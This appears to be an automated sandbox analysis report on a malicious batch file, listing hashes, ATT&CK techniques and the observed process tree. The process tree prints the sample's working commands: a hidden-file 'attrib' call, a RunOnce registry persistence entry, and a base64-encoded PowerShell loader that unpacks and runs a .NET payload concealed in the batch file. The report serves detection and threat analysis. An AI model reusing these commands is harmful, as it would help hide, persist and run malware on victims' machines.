75ce85c7868efffdd665bf1234b0e2cfc31a5bd24a493cfb6e237e7de32cb73e

General

Target

4qo856.bat
Size

2.1MB
MD5

e8939f95a675b9fb924eebe38827c456
SHA1

fc8b276222231d8184c21c69b655903b84a59430
SHA256

75ce85c7868efffdd665bf1234b0e2cfc31a5bd24a493cfb6e237e7de32cb73e
SHA512

f149ca122eddf7e8f611427ebd146608096884ee3b9e4b97c77d2771f6119afb13f357a3d5192e099a6168606c3d3c151eefe36779f8c82640b8a2b2a75c5e08
SSDEEP

24576:NnNaBvX2dfBil92AzBE4y1/feTDVzt6iZ+9/5KbCSfpItxCxe0U1k2jPaez/+L6a:KGwl2vuuiY50Tk91HLiA5dLkll1n

Score

8^/10

persistence

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

4qo856.bat.exe

pid process

1064 4qo856.bat.exe

pid	process
1064	4qo856.bat.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\4qo856 = "C:\\Users\\Admin\\AppData\\Roaming\\4qo856.bat"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

4qo856.bat.exe

pid process

1064 4qo856.bat.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

4qo856.bat.exe

pid process

1064 4qo856.bat.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

4qo856.bat.exe

description pid process

Token: SeDebugPrivilege 1064 4qo856.bat.exe

pid	process
1064	4qo856.bat.exe

pid	process
1064	4qo856.bat.exe

description	pid	process
Token: SeDebugPrivilege	1064	4qo856.bat.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 1272 wrote to memory of 1296	1272	cmd.exe	reg.exe
PID 1272 wrote to memory of 1296	1272	cmd.exe	reg.exe
PID 1272 wrote to memory of 1296	1272	cmd.exe	reg.exe
PID 1272 wrote to memory of 840	1272	cmd.exe	attrib.exe
PID 1272 wrote to memory of 840	1272	cmd.exe	attrib.exe
PID 1272 wrote to memory of 840	1272	cmd.exe	attrib.exe
PID 1272 wrote to memory of 1064	1272	cmd.exe	4qo856.bat.exe
PID 1272 wrote to memory of 1064	1272	cmd.exe	4qo856.bat.exe
PID 1272 wrote to memory of 1064	1272	cmd.exe	4qo856.bat.exe
PID 1272 wrote to memory of 1064	1272	cmd.exe	4qo856.bat.exe
PID 1272 wrote to memory of 584	1272	cmd.exe	attrib.exe
PID 1272 wrote to memory of 584	1272	cmd.exe	attrib.exe
PID 1272 wrote to memory of 584	1272	cmd.exe	attrib.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

840 attrib.exe
584 attrib.exe

pid	process
840	attrib.exe
584	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\4qo856.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1272

C:\Windows\system32\attrib.exe
attrib +h C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exe
2⤵
- Views/modifies file attributes
PID:840

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v 4qo856 /d "C:\Users\Admin\AppData\Roaming\4qo856.bat"
2⤵
- Adds Run key to start application
PID:1296

C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exe
C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAL8AKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwC/ACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAZQBuAHQAcgB5AFAAbwBpAG4AdABNAGUAdABoAG8AZAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkALgBXAGgAZQByAGUAKAB7ACAAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAJwBQAHIAbwBnAHIAYQBtACcAIAB9ACwAIAAnAEYAaQByAHMAdAAnACkALgBHAGUAdABNAGUAdABoAG8AZAAoACcATQBhAGkAbgAnACwAIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBCAGkAbgBkAGkAbgBnAEYAbABhAGcAcwBdACAAJwBTAHQAYQB0AGkAYwAsACAAUAB1AGIAbABpAGMALAAgAE4AbwBuAFAAdQBiAGwAaQBjACcAKQA7ACAAJABlAG4AdAByAHkAUABvAGkAbgB0AE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1064

C:\Windows\system32\attrib.exe
attrib -h C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exe
2⤵
- Views/modifies file attributes
PID:584

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Hidden Files and Directories

1

T1158

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Hidden Files and Directories

1

T1158

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exe
Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exe
Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
memory/584-62-0x0000000000000000-mapping.dmp

Download
memory/840-55-0x0000000000000000-mapping.dmp

Download
memory/1064-57-0x0000000000000000-mapping.dmp

Download
memory/1064-59-0x0000000075931000-0x0000000075933000-memory.dmp

Filesize
8KB

Download
memory/1064-60-0x0000000073D80000-0x000000007432B000-memory.dmp

Filesize
5.7MB

Download
memory/1064-61-0x0000000073D80000-0x000000007432B000-memory.dmp

Filesize
5.7MB

Download
memory/1296-54-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing